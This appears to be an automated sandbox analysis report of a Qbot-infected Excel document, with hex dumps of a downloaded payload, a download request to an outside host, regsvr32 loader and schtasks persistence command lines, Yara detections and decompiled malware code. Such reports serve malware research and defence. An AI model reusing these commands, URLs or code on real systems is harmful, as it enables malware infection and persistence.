                                                                                                                                                                                              Data Ascii: 'f]333.3Rk2;3e,f f:e]effG?33!3f3_
                                                                                                                                                                                              2021-09-29 21:45:41 UTC392INData Raw: fe 00 ff 0d ff fe 00 ff d6 fe ff 23 af 00 fe 00 ff 3f 00 f7 ff ff ff 00 fe de 00 00 00 83 fe 00 33 fb 00 32 00 ff 00 fc 32 00 00 ff ff 00 00 00 ff 00 00 00 e5 00 32 cd ff ff 00 ff fe 00 cf fe fe 00 11 00 00 fe ff 00 ff ff 35 ff 01 fe 01 00 00 ff 05 33 74 00 ff fe ff fe cf ff 00 fe 00 fe ff ff 00 00 ff ff 00 88 ff 00 00 00 fe 03 00 fe 33 d6 00 fe 66 00 ff 00 00 eb 00 00 65 ff 05 fe 39 00 60 ff ff fe 00 00 d6 00 00 ff fe d5 ff 00 46 ff ff 00 00 d7 ff ff 3f 00 00 c2 fe 32 00 ff ff fe fe c7 ff e6 00 ff ff ff ff 1e 00 06 ff 6a ff ff 60 bf ff fe 00 fe fe fe 00 00 00 fe ff 00 ff 00 d6 66 92 00 ff 0c fe ff ff ff 00 ff ff 33 fd fe d5 d7 fe d8 17 fe 00 ff e3 ff 00 d7 ff 00 ff e2 ee fe fe fb 00 00 00 ff 00 e0 ff fe fe fc fe ff ff fe a3 32 66 00 00 00 ff fe fd 02 fe
                                                                                                                                                                                              Data Ascii: #?322253t3fe9`F?2j`f32f
                                                                                                                                                                                              2021-09-29 21:45:41 UTC400INData Raw: f6 bf ff ff fe fe ff fe ff 00 00 00 fe 00 00 00 00 ff fe ff 00 00 ff ff ff fe ff fe 00 00 00 ff 00 00 00 00 00 66 fe ff 00 39 00 ff 00 ff ff fe ff 00 00 00 fe 00 ff 00 00 00 00 00 ff 00 5f fe fe ff fe c4 f1 f3 00 00 00 00 00 fe 66 fe 00 00 fe 00 3f ff ff 66 fe 00 00 fe ff ff ff 66 00 ff ec ff fe b2 d5 79 02 80 00 ff 33 fe fe 00 00 fe 33 00 eb ff 32 ff 00 00 00 fe 66 33 ff fa f8 fe 00 00 65 ff ff fe 00 ff 00 ff 63 a4 fe 00 00 00 d6 ff 33 33 fe ea ea 00 00 32 00 00 00 00 e5 00 00 fe ff 00 00 ff fe fe fe 65 fe fe 00 33 00 46 49 fe fe 3f 1b fe ff d6 00 ff ff 00 ff ff 00 00 00 fe 00 fe ff 00 00 ff fe ff ff fc fe ff 00 00 00 ff e5 fe 3f 66 00 32 fe c2 ff ff fe 00 61 00 00 00 fe 00 fe 00 00 d5 ff ff fe ff 00 00 fe ff 00 33 00 00 d1 ff 08 00 00 00 fe fe 00 00 fe
                                                                                                                                                                                              Data Ascii: f9_f?ffy332f3ec332e3FI??f2a3
                                                                                                                                                                                              2021-09-29 21:45:41 UTC408INData Raw: 00 ff 00 00 ff d6 00 f9 6c fe 66 ff 00 fe 00 00 00 fe d6 ff aa ff fe 00 66 d5 00 00 00 00 00 00 00 ff ff fe ff 00 fe ff 33 fe fe fb ff d5 00 00 ff 00 ff ff ff 65 ff 00 00 00 ff fe 00 00 00 00 fe ff 33 fe 33 00 00 00 fe ff ff ff fe 65 ff 32 66 fe ff 00 fe e1 fe fe 00 65 fe 00 ff 00 00 fe ff 00 00 ff fe 32 fe ff 62 66 fe 2f fe 65 65 00 00 33 ff ff 33 fd 00 fe 33 00 fe ff ff 00 ff 67 ff fe 16 ff ff 66 fe ff d5 fe 00 33 ff ff 00 fe 00 00 fe 32 ca fe 00 66 65 00 00 fe 00 00 00 ff 00 65 ff 00 00 31 ff 00 00 fe e4 00 ff 00 c6 ff ff ff 00 c0 87 fe 00 ff 00 00 00 38 fe 00 ff 00 fe 00 fe 00 8c e9 00 00 00 00 d3 00 fe 00 00 ff 00 ff 00 fe 00 00 ff 00 65 66 66 00 ff 00 59 fe 0c fe 65 fe ff cf ff b2 2a fe 00 fd 4b 00 fe ff ff 00 ff 00 cd ff 64 7e fe bc 32 fe 00 ff ff
                                                                                                                                                                                              Data Ascii: lff3e33e2fe2bf/ee333gf32fee18effYe*Kd~2
                                                                                                                                                                                              2021-09-29 21:45:41 UTC416INData Raw: ff 00 00 00 00 00 ff 33 00 32 d6 00 65 fe ff 33 9c d5 66 00 ff ae ff 65 ce 32 00 ff ff fe ff d5 00 32 00 ff 00 ff fd ff 00 ff ff ff d6 00 00 fe 33 00 00 65 fd fe 00 ff 00 fb fe fe ff 00 00 f8 fe 00 fe ff 00 fe 00 00 fe d5 00 00 ff 00 d5 d5 d3 ff 00 66 00 ff fe 00 ff ff 00 00 00 fc 00 00 fc 6a 65 7a 00 b4 e0 ff 66 fe fe ff 32 00 fe 00 fe 00 00 ff ff ff 19 fe 00 ff 00 06 ff ff 00 fc ff 00 00 d6 00 fe 00 fd 00 00 00 00 fe 00 fe fe 00 00 ff dc 00 d6 fe 32 00 ff 00 00 ff 00 00 1a c0 fe 00 00 fe ff ff 9c fb 20 ff 00 fe d6 00 00 d8 ff 00 00 00 00 ff fe ff 00 00 00 00 ff fe fe ef 00 00 ff d5 65 fe ec ff b7 24 bb 00 fe 8d 7d 00 33 ff c4 79 fe 00 ff ff fe 46 ff ff 00 87 fe fe ff ff fe 00 ff 00 00 fe 66 ff 00 00 d6 fe fb 00 00 c7 be fe fe ff 00 06 ff fe 00 00 fe fe
                                                                                                                                                                                              Data Ascii: 32e3fe223efjezf22 e$}3yFf
                                                                                                                                                                                              2021-09-29 21:45:41 UTC424INData Raw: 82 06 00 ea 82 06 00 fa 82 06 00 10 83 06 00 1c 83 06 00 26 83 06 00 32 83 06 00 40 83 06 00 4e 83 06 00 58 83 06 00 68 83 06 00 78 83 06 00 8e 83 06 00 a4 83 06 00 b4 83 06 00 c6 83 06 00 d4 83 06 00 e6 83 06 00 00 84 06 00 18 84 06 00 32 84 06 00 4c 84 06 00 66 84 06 00 76 84 06 00 8c 84 06 00 a6 84 06 00 b2 84 06 00 c4 84 06 00 d6 84 06 00 00 00 00 00 d6 80 06 00 c6 80 06 00 b8 80 06 00 00 00 00 00 8e 80 06 00 00 00 00 00 cb 02 48 65 61 70 41 6c 6c 6f 63 00 c0 01 47 65 74 43 75 72 72 65 6e 74 50 72 6f 63 65 73 73 00 cf 02 48 65 61 70 46 72 65 65 00 00 3f 03 4c 6f 61 64 4c 69 62 72 61 72 79 57 00 00 b2 04 53 6c 65 65 70 00 14 02 47 65 74 4d 6f 64 75 6c 65 46 69 6c 65 4e 61 6d 65 57 00 00 8f 00 43 72 65 61 74 65 46 69 6c 65 57 00 85 02 47 65 74 54 65 6d
                                                                                                                                                                                              Data Ascii: &2@NXhx2LfvHeapAllocGetCurrentProcessHeapFree?LoadLibraryWSleepGetModuleFileNameWCreateFileWGetTem
                                                                                                                                                                                              2021-09-29 21:45:41 UTC432INData Raw: 00 00 00 e0 00 00 00 28 00 00 00 a3 00 00 00 f3 00 00 00 16 00 00 00 eb 00 00 00 d9 00 00 00 c7 00 00 00 47 00 00 00 16 00 00 00 20 00 00 00 07 0e 08 05 13 0c 13 06 0f 07 0b 00 0c 03 08 0f 13 05 08 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii: (G
                                                                                                                                                                                              2021-09-29 21:45:41 UTC440INData Raw: 3b 20 3b 40 3b 60 3b 6c 3b 84 3b 88 3b a8 3b c8 3b e8 3b f0 3b f4 3b 0c 3c 10 3c 20 3c 44 3c 50 3c 58 3c 88 3c 90 3c 94 3c ac 3c b0 3c cc 3c d0 3c d8 3c e0 3c e8 3c ec 3c f4 3c 08 3d 24 3d 28 3d 44 3d 48 3d 68 3d 84 3d 88 3d a4 3d a8 3d c8 3d e8 3d 04 3e 08 3e 00 90 06 00 08 01 00 00 04 30 08 30 24 30 40 30 60 30 88 30 ec 30 f0 30 10 31 30 31 50 31 54 31 58 31 70 31 74 31 78 31 ac 32 b4 32 bc 32 c4 32 cc 32 d4 32 dc 32 e4 32 ec 32 f4 32 fc 32 04 33 0c 33 14 33 1c 33 24 33 2c 33 34 33 3c 33 44 33 4c 33 54 33 5c 33 64 33 00 39 60 3a 70 3a 80 3a 90 3a a0 3a c4 3a d0 3a d4 3a d8 3a dc 3a e0 3a e8 3a ec 3a a8 3b b0 3b b4 3b b8 3b e0 3b e4 3b e8 3b ec 3b f0 3b f4 3b f8 3b fc 3b 00 3c 04 3c 08 3c 0c 3c 10 3c 14 3c 18 3c 1c 3c 20 3c 24 3c 28 3c 2c 3c 30 3c 34 3c
                                                                                                                                                                                              Data Ascii: ; ;@;`;l;;;;;;;;<< <D<P<X<<<<<<<<<<<<<=$=(=D=H=h=======>>00$0@0`0000101P1T1X1p1t1x1222222222223333$3,343<3D3L3T3\3d39`:p::::::::::::;;;;;;;;;;;;<<<<<<<< <$<(<,<0<4<
                                                                                                                                                                                              2021-09-29 21:45:41 UTC448INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              2021-09-29 21:45:41 UTC456INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              2021-09-29 21:45:41 UTC464INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                              2192.168.2.349752162.222.225.250443C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                              2021-09-29 21:45:42 UTC466OUTGET /9DPZqAfZdq5z/key.xml HTTP/1.1
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                              Host: mercanets.com
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              2021-09-29 21:45:44 UTC467INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 29 Sep 2021 21:45:42 GMT
                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                              Code Manipulations

                                                                                                                                                                                              Statistics

                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                              Behavior

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              System Behavior

                                                                                                                                                                                              Analysis Process: EXCEL.EXE PID: 5340 Parent PID: 744

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:45:34
                                                                                                                                                                                              Start date:29/09/2021
                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                              Imagebase:0x9b0000
                                                                                                                                                                                              File size:27110184 bytes
                                                                                                                                                                                              MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              Chronological Activities

                                                                                                                                                                                              Analysis Process: regsvr32.exe PID: 7012 Parent PID: 5340

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:45:44
                                                                                                                                                                                              Start date:29/09/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test
                                                                                                                                                                                              Imagebase:0x210000
                                                                                                                                                                                              File size:20992 bytes
                                                                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              Chronological Activities

                                                                                                                                                                                              Analysis Process: regsvr32.exe PID: 6932 Parent PID: 5340

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:45:44
                                                                                                                                                                                              Start date:29/09/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test
                                                                                                                                                                                              Imagebase:0x210000
                                                                                                                                                                                              File size:20992 bytes
                                                                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000009.00000003.380505097.0000000003320000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              Chronological Activities

                                                                                                                                                                                              Analysis Process: regsvr32.exe PID: 5528 Parent PID: 5340

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:45:45
                                                                                                                                                                                              Start date:29/09/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.test
                                                                                                                                                                                              Imagebase:0x210000
                                                                                                                                                                                              File size:20992 bytes
                                                                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              Chronological Activities

                                                                                                                                                                                              Analysis Process: explorer.exe PID: 6888 Parent PID: 6932

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:46:24
                                                                                                                                                                                              Start date:29/09/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                              Imagebase:0xd20000
                                                                                                                                                                                              File size:3611360 bytes
                                                                                                                                                                                              MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              Chronological Activities

                                                                                                                                                                                              Analysis Process: schtasks.exe PID: 3016 Parent PID: 6888

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:46:26
                                                                                                                                                                                              Start date:29/09/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtwplfwnel /tr 'regsvr32.exe -s \'C:\Datop\test1.test\'' /SC ONCE /Z /ST 23:48 /ET 24:00
                                                                                                                                                                                              Imagebase:0xce0000
                                                                                                                                                                                              File size:185856 bytes
                                                                                                                                                                                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              Chronological Activities

                                                                                                                                                                                              Analysis Process: conhost.exe PID: 6704 Parent PID: 3016

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:46:27
                                                                                                                                                                                              Start date:29/09/2021
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff7f20f0000
                                                                                                                                                                                              File size:625664 bytes
                                                                                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              Chronological Activities

                                                                                                                                                                                              Disassembly

                                                                                                                                                                                              Code Analysis

                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                Analysis Process: regsvr32.exe PID: 6932 Parent PID: 5340 regsvr32.exeCOMMON

                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                Function 1000D061, Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 282COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                			E1000D061(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				char _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				intOrPtr* _t88;
				intOrPtr _t90;
				intOrPtr _t91;
				intOrPtr _t92;
				int _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				intOrPtr _t111;
				char _t115;
				signed int _t117;
				char _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				char _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0x1001e69c; // 0x10000000
				_t81 = E100085E5(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0x1001e684; // 0x4d2f878
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E10012339( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E10008F9F(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E1000BA47(); // executed
				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
				_t178 =  *_t88;
				if(E1000BBCF( *_t88) == 0) {
					_t90 = E1000BAA4(_t178, _t222); // executed
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220, executed
				_t91 = E1000E433(_t12); // executed
				 *((intOrPtr*)(_t222 + 0x218)) = _t91;
				_t92 = E1000E3F8(_t12); // executed
				 *((intOrPtr*)(_t222 + 0x21c)) = _t92;
				_push( &_v16);
				 *(_t222 + 0x224) = _t162;
				_push( &_v8);
				_v12 = 0x80;
				_push( &_v692);
				_v8 = 0x100;
				_push( &_v12);
				_t22 = _t222 + 0x114; // 0x114
				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
				_push(0); // executed
				if(GetLastError() == 0) {
					GetLastError();
				}
				_t98 = GetSystemMetrics(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E10008F9F(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114, executed
				_t103 = E1000B7EA(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E1000B6BF(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E10008FB9(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E1000D442(_t43, E1000C3BB(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E1000B8CC(_t108, _t44, _t241);
				_t199 = GetCurrentProcess(); // executed
				_t111 = E1000BC21(_t110); // executed
				 *((intOrPtr*)(_t222 + 0x101c)) = _t111;
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0x1001e684; // 0x4d2f878
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E100095C2(_t199, 0x10c);
				_t200 =  *0x1001e684; // 0x4d2f878
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0x1001e684; // 0x4d2f878
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E100085B6( &_v8);
				_t124 =  *0x1001e684; // 0x4d2f878
				_t61 = _t222 + 0x1434; // 0x1434
				_t219 = _t61;
				 *_t224 = 0x209;
				_push(_t219);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
					E10009621(_t219, 0x105, L"%s\\%s", _t168);
					_t152 =  *0x1001e684; // 0x4d2f878
					_t224 =  &(_t224[5]);
					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
				}
				_push(0x20a);
				_t64 = _t222 + 0x122a; // 0x122a
				_t169 = L"TEMP";
				_t127 =  *0x1001e684; // 0x4d2f878
				_push(_t169);
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t149 =  *0x1001e684; // 0x4d2f878
					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
				}
				_push(0x40);
				_t220 = L"SystemDrive";
				_push( &_v180);
				_t130 =  *0x1001e684; // 0x4d2f878
				_push(_t220);
				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
					_t147 =  *0x1001e684; // 0x4d2f878
					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
				}
				_v8 = 0x7f;
				_t72 = _t222 + 0x199c; // 0x199c
				_t134 =  *0x1001e684; // 0x4d2f878
				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
				_t75 = _t222 + 0x100c; // 0x100c
				E10012339(E1000D442(_t75, E1000C3BB(_t75), 0),  &_v2680);
				_t76 = _t222 + 0x1858; // 0x1858
				E1001230B( &_v2680, _t76, 0x20);
				_t79 = _t222 + 0x1878; // 0x1878
				E1000900E(1, _t79, 0x14, 0x1e,  &_v2680);
				_t145 = E1000CD75(_t79); // executed
				 *((intOrPtr*)(_t222 + 0x1898)) = _t145;
				return _t222;
			}





















































                                                                                                                                                                                                0x1000d061
                                                                                                                                                                                                0x1000d06b
                                                                                                                                                                                                0x1000d077
                                                                                                                                                                                                0x1000d07c
                                                                                                                                                                                                0x1000d081
                                                                                                                                                                                                0x1000d441
                                                                                                                                                                                                0x1000d441
                                                                                                                                                                                                0x1000d08e
                                                                                                                                                                                                0x1000d094
                                                                                                                                                                                                0x1000d099
                                                                                                                                                                                                0x1000d09f
                                                                                                                                                                                                0x1000d0af
                                                                                                                                                                                                0x1000d0bb
                                                                                                                                                                                                0x1000d0bb
                                                                                                                                                                                                0x1000d0c4
                                                                                                                                                                                                0x1000d0ca
                                                                                                                                                                                                0x1000d0cc
                                                                                                                                                                                                0x1000d0d5
                                                                                                                                                                                                0x1000d0d5
                                                                                                                                                                                                0x1000d0e1
                                                                                                                                                                                                0x1000d0e5
                                                                                                                                                                                                0x1000d0ea
                                                                                                                                                                                                0x1000d0f0
                                                                                                                                                                                                0x1000d0f9
                                                                                                                                                                                                0x1000d107
                                                                                                                                                                                                0x1000d10e
                                                                                                                                                                                                0x1000d113
